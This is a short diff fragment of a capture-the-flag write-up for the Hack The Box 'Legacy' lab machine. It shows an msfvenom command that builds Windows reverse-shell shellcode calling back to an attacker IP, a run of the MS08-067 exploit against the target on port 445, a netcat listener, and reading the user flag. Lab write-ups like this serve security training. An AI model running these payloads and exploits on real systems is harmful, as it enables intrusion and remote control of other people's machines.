h4md153v63n/CTFs/01_HTB/38_Legacy.md

 + Update the shellcode in the exploit with our own.
 Copy the shellcode from **shellcode.txt** and overwrite the payload in the exploit.

 ```
+# On the kali attack vm:
 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.24 LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python -v shellcode -a x86 --platform windows -o shellcode.txt

 python ms08-067.py 10.10.10.4 6 445

 nc -lnvp 4444

+# On the target machine:
 cd Documents and Settings\john\Desktop

 type user.txt